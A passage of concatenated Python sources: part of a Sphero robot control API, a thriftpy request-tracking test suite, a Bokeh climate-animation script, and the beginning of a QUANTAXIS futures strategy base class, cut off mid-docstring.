backward, and 0 is stopped."""
return self.__speed
def get_heading(self):
"""Provides the target directional angle, in degrees. Assuming you aim the robot with the tail facing you,
then 0° heading is forward, 90° is right, 180° is backward, and 270° is left."""
return self.__heading
def get_main_led(self):
"""Provides the RGB color of the main LEDs, from 0 to 255 for each color channel.
``get_main_led().r`` is the red channel, from 0 - 255.
``get_main_led().g`` is the green channel, from 0 - 255.
``get_main_led().b`` is the blue channel, from 0 - 255."""
return self.__leds.get('main', None)
# Sphero BOLT Sensors
# TODO Compass Direction
def get_luminosity(self):
"""Provides the light intensity from 0 - 100,000 lux, where 0 lux is full darkness and 30,000-100,000 lux is
direct sunlight. You may need to adjust a condition based on luminosity in different environments as light
intensity can vary greatly between rooms."""
return self.__sensor_data.get('ambient_light', None)
def get_last_ir_message(self):
"""Returns which channel the last infrared message was received on. You need to declare the ``on_ir_message``
event for each IR message you plan to see returned."""
return self.__last_message
def get_back_led(self):
"""Provides the RGB color of the back LED, from 0 to 255 for each color channel."""
return self.__leds.get('back', None)
def get_front_led(self):
"""Provides the RGB color of the front LED, from 0 to 255 for each color channel."""
return self.__leds.get('front', None)
# Sphero RVR Sensors
def get_color(self):
"""Provides the RGB color, from 0 to 255 for each color channel, that is returned from RVR's color sensor.
``get_color().r`` is the red channel, from 0 - 255, that is returned from RVR's color sensor.
``get_color().g`` is the green channel, from 0 - 255, that is returned from RVR's color sensor.
``get_color().b`` is the blue channel, from 0 - 255, that is returned from RVR's color sensor."""
if 'color_detection' in self.__sensor_data:
color = self.__sensor_data['color_detection']
return Color(round(color['r']), round(color['g']), round(color['b']))
return None
# BB-9E Sensors
def get_dome_leds(self):
"""Provides the brightness of the Dome LEDs, from 0 to 15."""
return self.__leds.get('dome', None)
# R2-D2 & R2-Q5 Sensors
def get_holo_projector_led(self):
"""Provides the brightness of the Holographic Projector LED, from 0 to 255."""
return self.__leds.get('holo_projector', None)
def get_logic_display_leds(self):
"""Provides the brightness of the white Logic Display LEDs, from 0 to 255."""
return self.__leds.get('logic_display', None)
# Communications
def start_ir_broadcast(self, near: int, far: int):
"""Sets the IR emitters to broadcast on two specified channels, from 0 to 7, so other BOLTs can follow or evade.
The broadcaster uses two channels because the first channel emits near IR pulses (< 1 meter), and the second
channel emits far IR pulses (1 to 3 meters) so the following and evading BOLTs can detect these messages on
their IR receivers with a sense of relative proximity to the broadcaster. You can't use a channel for more than
one purpose at time, such as sending messages along with broadcasting, following, or evading. For example,
use ``start_ir_broadcast(0, 1)`` to broadcast on channels 0 and 1, so that other BOLTs following or evading on
0 and 1 will recognize this robot."""
ToyUtil.start_robot_to_robot_infrared_broadcasting(self.__toy, bound_value(0, far, 7), bound_value(0, near, 7))
def stop_ir_broadcast(self):
"""Stops the broadcasting behavior."""
ToyUtil.stop_robot_to_robot_infrared_broadcasting(self.__toy)
def start_ir_follow(self, near: int, far: int):
"""Sets the IR receivers to look for broadcasting BOLTs on the same channel pair, from 0 to 7. Upon receiving
messages from a broadcasting BOLT, the follower will adjust its heading and speed to follow the broadcaster.
When a follower loses sight of a broadcaster, the follower will spin in place to search for the broadcaster.
You can't use a channel for more than one purpose at time, such as sending messages along with broadcasting,
following, or evading. For example, use ``start_ir_follow(0, 1)`` to follow another BOLT that is broadcasting on
channels 0 and 1."""
ToyUtil.start_robot_to_robot_infrared_following(self.__toy, bound_value(0, far, 7), bound_value(0, near, 7))
def stop_ir_follow(self):
"""Stops the following behavior."""
ToyUtil.stop_robot_to_robot_infrared_following(self.__toy)
def start_ir_evade(self, near: int, far: int):
"""Sets the IR receivers to look for broadcasting BOLTs on the same channel pair, from 0 to 7. Upon receiving
messages from a broadcasting BOLT, the evader will adjust its heading to roll away from the broadcaster.
When an evader loses sight of a broadcaster, the evader will spin in place to search for the broadcaster.
The evader may stop if it is in the far range for a period of time so it does not roll too far away from the
broadcaster. You can't use a channel for more than one purpose at time, such as sending messages along with
broadcasting, following, or evading. For example, use ``start_ir_evade(0, 1)`` to evade another BOLT that is
broadcasting on channels 0 and 1."""
ToyUtil.start_robot_to_robot_infrared_evading(self.__toy, bound_value(0, far, 7), bound_value(0, near, 7))
def stop_ir_evade(self):
"""Stops the evading behavior."""
ToyUtil.stop_robot_to_robot_infrared_evading(self.__toy)
def send_ir_message(self, channel: int, intensity: int):
"""Sends a message on a given IR channel, at a set intensity, from 1 to 64. Intensity is proportional to
proximity, where a 1 is the closest, and 64 is the farthest. For example, use ``send_ir_message(4, 5)`` to send
message 4 at intensity 5. You will need to use ``onIRMessage4(channel)`` event for on a corresponding robot to
receive the message. Also see the ``getLastIRMessage()`` sensor to keep track of the last message your robot
received. You can't use a channel for more than one purpose at time, such as sending messages along with
broadcasting, following, or evading."""
ToyUtil.send_robot_to_robot_infrared_message(
self.__toy, bound_value(0, channel, 7), bound_value(1, intensity, 64))
def listen_for_ir_message(self, channels: Union[int, Iterable[int]], duration: int = 0xFFFFFFFF):
if isinstance(channels, int):
channels = (channels,)
if len(channels) > 0:
ToyUtil.listen_for_robot_to_robot_infrared_message(
self.__toy, map(lambda v: bound_value(0, v, 7), channels), bound_value(0, duration, 0xFFFFFFFF))
def _robot_to_robot_infrared_message_received_notify(self, infrared_code: int):
self.__last_message = infrared_code
self.__call_event_listener(EventType.on_ir_message, infrared_code)
def listen_for_color_sensor(self, colors: Iterable[Color]):
if self.__toy.implements(IO.set_active_color_palette):
palette = []
for i, color in enumerate(colors):
palette.extend((i, color.r, color.g, color.b))
if palette:
self.__toy.set_active_color_palette(palette)
# Events: are predefined robot functions into which you can embed conditional logic. When an event occurs, the
# conditional logic is called and then the program returns to the main loop where it left off. The event will
# be called every time it occurs by default, unless you customize it.
def __call_event_listener(self, event_type: EventType, *args, **kwargs):
for f in self.__listeners[event_type]:
threading.Thread(target=f, args=(self, *args), kwargs=kwargs).start()
def register_event(self, event_type: EventType, listener: Callable[..., None]):
"""Registers the event type with listener. If listener is ``None`` then it removes all listeners of the
specified event type.
**Note**: listeners will be called in a newly spawned thread, meaning the caller have to deal with concurrency
if needed. This library is thread-safe."""
if event_type not in EventType:
raise ValueError(f'Event type {event_type} does not exist')
if listener:
self.__listeners[event_type].add(listener)
else:
del self.__listeners[event_type]
|
test_tracking.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import contextlib
import os
import multiprocessing
import time
import tempfile
import pickle
import thriftpy
try:
import dbm
except ImportError:
import dbm.ndbm as dbm
import pytest
from thriftpy.contrib.tracking import TTrackedProcessor, TTrackedClient, \
TrackerBase, track_thrift
from thriftpy.contrib.tracking.tracker import ctx
from thriftpy.thrift import TProcessorFactory, TClient, TProcessor
from thriftpy.server import TThreadedServer
from thriftpy.transport import TServerSocket, TBufferedTransportFactory, \
TTransportException, TSocket
from thriftpy.protocol import TBinaryProtocolFactory
addressbook = thriftpy.load(os.path.join(os.path.dirname(__file__),
"addressbook.thrift"))
_, db_file = tempfile.mkstemp()
class SampleTracker(TrackerBase):
def record(self, header, exception):
db = dbm.open(db_file, 'w')
key = "%s:%s" % (header.request_id, header.seq)
db[key.encode("ascii")] = pickle.dumps(header.__dict__)
db.close()
tracker = SampleTracker("test_client", "test_server")
class Dispatcher(object):
def __init__(self):
self.ab = addressbook.AddressBook()
self.ab.people = {}
def ping(self):
return True
def hello(self, name):
return "hello %s" % name
def sleep(self, ms):
return True
def remove(self, name):
person = addressbook.Person(name="mary")
with client(port=16098) as c:
c.add(person)
return True
def get_phonenumbers(self, name, count):
return [addressbook.PhoneNumber(number="sdaf"),
addressbook.PhoneNumber(number='saf')]
def add(self, person):
with client(port=16099) as c:
c.get_phonenumbers("jane", 1)
with client(port=16099) as c:
c.ping()
return True
def get(self, name):
raise addressbook.PersonNotExistsError()
class TSampleServer(TThreadedServer):
def __init__(self, processor_factory, trans, trans_factory, prot_factory):
self.daemon = False
self.processor_factory = processor_factory
self.trans = trans
self.itrans_factory = self.otrans_factory = trans_factory
self.iprot_factory = self.oprot_factory = prot_factory
self.closed = False
def handle(self, client):
processor = self.processor_factory.get_processor()
itrans = self.itrans_factory.get_transport(client)
otrans = self.otrans_factory.get_transport(client)
iprot = self.iprot_factory.get_protocol(itrans)
oprot = self.oprot_factory.get_protocol(otrans)
try:
while True:
processor.process(iprot, oprot)
except TTransportException:
pass
except Exception:
raise
itrans.close()
otrans.close()
def gen_server(port=16029, tracker=tracker, processor=TTrackedProcessor):
args = [processor, addressbook.AddressBookService, Dispatcher()]
if tracker:
args.insert(1, tracker)
processor = TProcessorFactory(*args)
server_socket = TServerSocket(host="localhost", port=port)
server = TSampleServer(processor, server_socket,
prot_factory=TBinaryProtocolFactory(),
trans_factory=TBufferedTransportFactory())
ps = multiprocessing.Process(target=server.serve)
ps.start()
return ps, server
@pytest.fixture
def server(request):
ps, ser = gen_server()
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@pytest.fixture
def server1(request):
ps, ser = gen_server(port=16098)
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@pytest.fixture
def server2(request):
ps, ser = gen_server(port=16099)
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@pytest.fixture
def not_tracked_server(request):
ps, ser = gen_server(port=16030, tracker=None, processor=TProcessor)
time.sleep(0.15)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
return ser
@contextlib.contextmanager
def client(client_class=TTrackedClient, port=16029):
socket = TSocket("localhost", port)
try:
trans = TBufferedTransportFactory().get_transport(socket)
proto = TBinaryProtocolFactory().get_protocol(trans)
trans.open()
args = [addressbook.AddressBookService, proto]
if client_class.__name__ == TTrackedClient.__name__:
args.insert(0, tracker)
yield client_class(*args)
finally:
trans.close()
@pytest.fixture
def dbm_db(request):
db = dbm.open(db_file, 'n')
db.close()
def fin():
try:
os.remove(db_file)
except OSError:
pass
request.addfinalizer(fin)
@pytest.fixture
def tracker_ctx(request):
def fin():
if hasattr(ctx, "header"):
del ctx.header
if hasattr(ctx, "counter"):
del ctx.counter
request.addfinalizer(fin)
def test_negotiation(server):
with client() as c:
assert c._upgraded is True
def test_tracker(server, dbm_db, tracker_ctx):
with client() as c:
c.ping()
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
assert len(headers) == 1
request_id = headers[0]
data = pickle.loads(db[request_id])
assert "start" in data and "end" in data
data.pop("start")
data.pop("end")
assert data == {
"request_id": request_id.decode("ascii").split(':')[0],
"seq": '1',
"client": "test_client",
"server": "test_server",
"api": "ping",
"status": True,
"annotation": {},
"meta": {},
}
def test_tracker_chain(server, server1, server2, dbm_db, tracker_ctx):
test_meta = {'test': 'test_meta'}
with client() as c:
with SampleTracker.add_meta(**test_meta):
c.remove("jane")
c.hello("yes")
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
assert len(headers) == 5
headers = [pickle.loads(db[i]) for i in headers]
headers.sort(key=lambda x: x["seq"])
assert len(set([i["request_id"] for i in headers])) == 2
seqs = [i["seq"] for i in headers]
metas = [i["meta"] for i in headers]
assert seqs == ['1', '1.1', '1.1.1', '1.1.2', '2']
assert metas == [test_meta] * 5
def test_exception(server, dbm_db, tracker_ctx):
with pytest.raises(addressbook.PersonNotExistsError):
with client() as c:
c.get("jane")
db = dbm.open(db_file, 'r')
headers = list(db.keys())
assert len(headers) == 1
header = pickle.loads(db[headers[0]])
assert header["status"] is False
def test_not_tracked_client_tracked_server(server):
with client(TClient) as c:
c.ping()
c.hello("world")
def test_tracked_client_not_tracked_server(not_tracked_server):
with client(port=16030) as c:
assert c._upgraded is False
c.ping()
c.hello("cat")
a = c.get_phonenumbers("hello", 54)
assert len(a) == 2
assert a[0].number == 'sdaf' and a[1].number == 'saf'
def test_request_id_func():
ctx.__dict__.clear()
header = track_thrift.RequestHeader()
header.request_id = "hello"
header.seq = 0
tracker = TrackerBase()
tracker.handle(header)
header2 = track_thrift.RequestHeader()
tracker.gen_header(header2)
assert header2.request_id == "hello"
def test_annotation(server, dbm_db, tracker_ctx):
with client() as c:
with SampleTracker.annotate(ann="value"):
c.ping()
with SampleTracker.annotate() as ann:
ann.update({"sig": "c.hello()", "user_id": "125"})
c.hello()
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
data = [pickle.loads(db[i]) for i in headers]
data.sort(key=lambda x: x["seq"])
assert data[0]["annotation"] == {"ann": "value"} and \
data[1]["annotation"] == {"sig": "c.hello()", "user_id": "125"}
def test_counter(server, dbm_db, tracker_ctx):
with client() as c:
c.get_phonenumbers("hello", 1)
with SampleTracker.counter():
c.ping()
c.hello("counter")
c.sleep(8)
time.sleep(0.2)
db = dbm.open(db_file, 'r')
headers = list(db.keys())
data = [pickle.loads(db[i]) for i in headers]
data.sort(key=lambda x: x["api"])
get, hello, ping, sleep = data
assert get["api"] == "get_phonenumbers" and get["seq"] == '1'
assert ping["api"] == "ping" and ping["seq"] == '1'
assert hello["api"] == "hello" and hello["seq"] == '2'
assert sleep["api"] == "sleep" and sleep["seq"] == '2'
|
animate_widgets.py
|
# -*- coding: utf-8 -*-
# **Exercise: Animate the timeseries plot**
# In[1]:
# Imports
from threading import Thread
import datetime
import logging
import time
import numpy as np
import netCDF4
import pandas as pd
from bokeh.plotting import vplot, hplot, cursession, curdoc, output_server, show
from bokeh.models.widgets import Button, Icon
from viz import climate_map, timeseries, legend, get_slice
# In[2]:
# Data
data = netCDF4.Dataset('data/Land_and_Ocean_LatLong1.nc')
t = data.variables['temperature']
df = pd.read_csv('data/Land_Ocean_Monthly_Anomaly_Average.csv', parse_dates=[0])
# In[3]:
# Output option
output_server("climate")
# In[4]:
from bokeh.plotting import figure
# Data
year = 1850
month = 1
years = [str(x) for x in np.arange(1850, 2015, 1)]
months = [str(x) for x in np.arange(1, 13, 1)]
months_str = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
month_str = months_str[month-1]
date = datetime.date(year, month, 1)
df['moving_average'] = pd.rolling_mean(df['anomaly'], 12)
df = df.fillna(0)
# New text Plot
title = figure(width=1200, height=100, x_range=(0, 1200), y_range=(0, 100), toolbar_location=None,
x_axis_type=None, y_axis_type=None, outline_line_color="#FFFFFF", tools="", min_border=0)
title.text(x=500, y=5, text=[month_str], text_font_size='36pt', text_color='black', name="month", text_font="Georgia")
title.text(x=350, y=5, text=[str(year)], text_font_size='36pt', text_color='black', name="year",text_font="Georgia")
# In[5]:
# Plots
climate_map = climate_map()
timeseries = timeseries()
legend = legend()
# ADD WIDGETS
play = True
def play_handler():
print("button_handler: start click")
global play
play = True
def stop_handler():
print("button_handler: stop click")
global play
play = False
button_start = Button(label="Start", type="success")
button_start.on_click(play_handler)
button_stop = Button(label="Stop", type="danger")
button_stop.on_click(stop_handler)
controls = hplot(button_start, button_stop)
# In[6]:
# New circle in timeseries plot
timeseries.circle(x=[date], y=[df[df.datetime == date].moving_average], size=8, name="circle")
# In[7]:
# Create layout
map_legend = hplot(climate_map, legend)
layout = vplot(controls, title, map_legend, timeseries)
# In[8]:
# Show
show(layout)
# In[9]:
# Select data source for climate_map and month and year
renderer = climate_map.select(dict(name="image"))
ds = renderer[0].data_source
month_renderer = title.select(dict(name="month"))
month_ds = month_renderer[0].data_source
year_renderer = title.select(dict(name="year"))
year_ds = year_renderer[0].data_source
# Select data source for timeseries data
timeseries_renderer = timeseries.select(dict(name="circle"))
timeseries_ds = timeseries_renderer[0].data_source
def should_play():
"""
Return true if we should play animation, otherwise block
"""
global play
while True:
if play:
return True
else:
time.sleep(0.05)
def background_thread(ds, year_ds, month_ds, timeseries_ds):
"""Plot animation, update data if play is True, otherwise stop"""
try:
while True:
for year_index in np.arange(2000, 2015, 1):
year_ds.data["text"] = [str(year_index)]
for month_index in np.arange(1, 13, 1):
if should_play():
month_ds.data["text"] = [months_str[month_index-1]]
image = get_slice(t, year_index, month_index)
date = datetime.date(year_index, month_index, 1)
timeseries_ds.data["x"] = [date]
timeseries_ds.data["y"] = [df[df.datetime == date].moving_average]
ds.data["image"] = [image]
cursession().store_objects(ds, year_ds, month_ds, timeseries_ds)
time.sleep(0.5)
time.sleep(0.5)
except:
logger.exception("An error occurred")
raise
# spin up a background thread
Thread(target=background_thread, args=(ds, year_ds, month_ds, timeseries_ds)).start()
# endlessly poll
cursession().poll_document(curdoc(), 0.04)
|
qactabase.py
|
import copy
import datetime
import json
import os
import re
import sys
import threading
import time
import uuid
import pandas as pd
import pymongo
import requests
from qaenv import (eventmq_amqp, eventmq_ip, eventmq_password, eventmq_port,
eventmq_username, mongo_ip, mongo_uri)
from QUANTAXIS.QAPubSub.consumer import subscriber, subscriber_routing, subscriber_topic
from QUANTAXIS.QAPubSub.producer import publisher_routing, publisher_topic
import QUANTAXIS as QA
from QUANTAXIS.QAStrategy.util import QA_data_futuremin_resample
from QUANTAXIS.QIFI.QifiAccount import ORDER_DIRECTION, QIFI_Account
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, RUNNING_ENVIRONMENT
class QAStrategyCtaBase():
def __init__(self, code='rb2005', frequence='1min', strategy_id='QA_STRATEGY', risk_check_gap=1, portfolio='default',
start='2020-01-01', end='2020-05-21', init_cash=1000000, send_wx=False,
data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password,
trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password,
taskid=None, mongo_ip=mongo_ip, model='py'):
"""
code 可以传入单个标的 也可以传入一组标的(list)
会自动基于code来判断是什么市场
TODO: 支持多个市场同时存在
self.trade_host 交易所在的eventmq的ip [挂ORDER_ROUTER的]
"""
self.username = 'admin'
self.password = 'admin'
self.trade_host = trade_host
self.code = code
self.frequence = frequence
self.strategy_id = strategy_id
self.portfolio = portfolio
self.data_host = data_host
self.data_port = data_port
self.data_user = data_user
self.data_password = data_password
self.trade_host = trade_host
self.trade_port = trade_port
self.trade_user = trade_user
self.trade_password = trade_password
self.start = start
self.end = end
self.init_cash = init_cash
self.taskid = taskid
self.running_time = ''
self.market_preset = QA.QAARP.MARKET_PRESET()
self._market_data = []
self.risk_check_gap = risk_check_gap
self.latest_price = {}
self.isupdate = False
self.model = model
self.new_data = {}
self._systemvar = {}
self._signal = []
self.send_wx = send_wx
if isinstance(self.code, str):
self.last_order_towards = {self.code: {'BUY': '', 'SELL': ''}}
else:
self.last_order_towards = dict(
zip(self.code, [{'BUY': '', 'SELL': ''} for i in range(len(self.code))]))
self.dt = ''
if isinstance(self.code, str):
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-z]+', self.code) else MARKET_TYPE.STOCK_CN
else:
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-z]+', self.code[0]) else MARKET_TYPE.STOCK_CN
self.bar_order = {'BUY_OPEN': 0, 'SELL_OPEN': 0,
'BUY_CLOSE': 0, 'SELL_CLOSE': 0}
self._num_cached = 120
self._cached_data = []
self.user_init()
@property
def bar_id(self):
return len(self._market_data)
@property
def BarsSinceEntryLong(self):
return self.bar_id - self.bar_order.get('BUY_OPEN', self.bar_id)
@property
def BarsSinceEntryShort(self):
return self.bar_id - self.bar_order.get('SELL_OPEN', self.bar_id)
@property
def EntryPriceLong(self):
code = self.get_code()
return self.get_positions(code).open_price_long
@property
def EntryPriceShort(self):
code = self.get_code()
return self.get_positions(code).open_price_short
def on_sync(self):
if self.running_mode != 'backtest':
self.pubacc.pub(json.dumps(self.acc.message),
routing_key=self.strategy_id)
def _debug_sim(self):
self.running_mode = 'sim'
if self.frequence.endswith('min'):
if isinstance(self.code, str):
self._old_data = QA.QA_fetch_get_future_min('tdx', self.code.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()), self.frequence)[:-1].set_index(['datetime', 'code'])
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low', 'close', 'volume']]
else:
self._old_data = pd.concat([QA.QA_fetch_get_future_min('tdx', item.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()), self.frequence)[:-1].set_index(['datetime', 'code']) for item in self.code], sort=False)
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low', 'close', 'volume']]
else:
self._old_data = pd.DataFrame()
self.database = pymongo.MongoClient(mongo_ip).QAREALTIME
self.client = self.database.account
self.subscriber_client = self.database.subscribe
self.acc = QIFI_Account(
username=self.strategy_id, password=self.strategy_id, trade_host=mongo_ip, init_cash=self.init_cash)
self.acc.initial()
self.acc.on_sync = self.on_sync
self.pub = publisher_routing(exchange='QAORDER_ROUTER', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
self.pubacc = publisher_topic(exchange='QAAccount', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
if isinstance(self.code, str):
self.subscribe_data(self.code.lower(), self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
else:
self.subscribe_multi(self.code, self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
print('account {} start sim'.format(self.strategy_id))
self.database.strategy_schedule.job_control.update(
{'strategy_id': self.strategy_id},
{'strategy_id': self.strategy_id, 'taskid': self.taskid,
'filepath': os.path.abspath(__file__), 'status': 200}, upsert=True)
def debug_sim(self):
self._debug_sim()
threading.Thread(target=self.sub.start, daemon=True).start()
def run_sim(self):
self._debug_sim()
self.sub.start()
def run_backtest(self):
self.debug()
self.acc.save()
risk = QA_Risk(self.acc)
risk.save()
try:
"""add rank flow if exist
QARank是我们内部用于评价策略ELO的库 此处并不影响正常使用
"""
from QARank import QA_Rank
QA_Rank(self.acc).send()
except:
pass
def user_init(self):
"""
用户自定义的init过程
"""
pass
def debug(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type, frequence=self.frequence)
self.positions = self.acc.get_position(self.code)
print(self.acc)
print(self.acc.market_type)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
data.data.apply(self.x1, axis=1)
def x1(self, item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print('backtest: Settle!')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
def debug_t0(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, init_hold={
self.code: 100000},
market_type=self.market_type, running_environment=RUNNING_ENVIRONMENT.TZERO)
self.positions = self.acc.get_position(self.code)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
for order in self.acc.close_positions_order:
order.trade('closebySys', order.price,
order.amount, order.datetime)
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print('backtest: Settle!')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.data.apply(x1, axis=1)
def debug_currenttick(self, freq):
data = QA.QA_fetch_get_future_transaction_realtime(
'tdx', self.code.upper())
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'currenttick_{}_{}'.format(str(datetime.date.today()), freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price/1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def debug_histick(self, freq):
data = QA.QA_fetch_get_future_transaction(
'tdx', self.code.upper(), self.start, self.end)
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'histick_{}_{}_{}'.format(self.start, self.end, freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price/1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def subscribe_data(self, code, frequence, data_host, data_port, data_user, data_password, model='py'):
"""[summary]
Arguments:
code {[type]} -- [description]
frequence {[type]} -- [description]
"""
if frequence.endswith('min'):
if model == 'py':
self.sub = subscriber(exchange='realtime_{}_{}'.format(
frequence, code), host=data_host, port=data_port, user=data_user, password=data_password)
elif model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
code), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.callback
elif frequence.endswith('s'):
import re
self._num_cached = 2*int(re.findall(r'\d+', self.frequence)[0])
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.second_callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.tick_callback
def subscribe_multi(self, codelist, frequence, data_host, data_port, data_user, data_password, model='py'):
if frequence.endswith('min'):
if model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0]), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item), routing_key=frequence)
elif model == 'py':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0].lower()), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item.lower()), routing_key=frequence)
self.sub.callback = self.callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(exchange='CTPX', routing_key=codelist[0].lower(
), host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='CTPX', routing_key=item.lower())
self.sub.callback = self.tick_callback
@property
def old_data(self):
return self._old_data
def update(self):
"""
此处是切换bar的时候的节点
"""
self._old_data = self._market_data
self._on_1min_bar()
@property
def market_datetime(self):
"""计算的market时间点 此api慎用 因为会惰性计算全市场的值
Returns:
[type] -- [description]
"""
return self.market_data.index.levels[0]
@property
def market_data(self):
if self.running_mode == 'sim':
return self._market_data
elif self.running_mode == 'backtest':
return pd.concat(self._market_data[-100:], axis=1, sort=False).T
def force_close(self):
# 强平
if self.positions.volume_long > 0:
self.send_order('SELL', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_long)
if self.positions.volume_short > 0:
self.send_order('BUY', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_short)
def upcoming_data(self, new_bar):
"""upcoming_bar :
在这一步中, 我们主要进行的是
1. 更新self._market_data
2. 更新账户
3. 更新持仓
4. 通知on_bar
Arguments:
new_bar {pd.DataFrame} -- [description]
"""
code = new_bar.index.levels[1][0]
if len(self._old_data) > 0:
self._market_data = pd.concat(
[self._old_data, new_bar], sort=False)
else:
self._market_data = new_bar
# QA.QA_util_log_info(self._market_data)
if self.isupdate:
self.update()
self.isupdate = False
self.update_account()
if isinstance(self.code, str):
self.positions.on_price_change(float(self.latest_price[code]))
else:
for item in self.code:
self.acc.get_position(item).on_price_change(
float(self.latest_price[code]))
self.on_bar(json.loads(
new_bar.reset_index().to_json(orient='records'))[0])
def ind2str(self, ind, ind_type):
z = ind.tail(1).reset_index().to_dict(orient='records')[0]
return json.dumps({'topic': ind_type, 'code': self.code, 'type': self.frequence, 'data': z})
def second_callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
